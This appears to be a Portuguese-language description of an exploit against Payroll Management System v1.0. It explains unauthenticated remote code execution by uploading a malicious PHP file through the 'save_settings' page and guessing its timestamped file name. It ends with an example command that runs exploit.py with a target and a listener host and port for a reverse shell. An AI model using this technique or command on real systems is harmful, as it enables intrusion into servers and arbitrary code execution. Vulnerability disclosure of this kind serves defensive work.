
Exploit de execução remota de código não autenticado para Payroll Management System v1.0 via upload de arquivo PHP malicioso com previsão de nome de arquivo baseada em timestamp.

RCE via upload de arquivo para https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html. Os nomes dos arquivos têm um timestamp adicionado com precisão de minuto. O script tenta adivinhar o nome do arquivo usando o timestamp do minuto atual, anterior e posterior.
O Payroll Management System v1.0 permite que usuários façam upload de imagens através da página "save_settings". Um atacante não autenticado pode usar essa funcionalidade para enviar um arquivo PHP malicioso. Os arquivos enviados são armazenados em uma pasta acessível publicamente e têm um timestamp com precisão de minuto acrescentado aos seus nomes, que pode ser facilmente calculado. A exploração bem-sucedida dessa vulnerabilidade resulta na capacidade de executar código arbitrário como o usuário que executa o servidor web.
python3 exploit.py -rhost somewebsite.com -rport 443 -lhost 192.168.22.23 -lport 443 -https
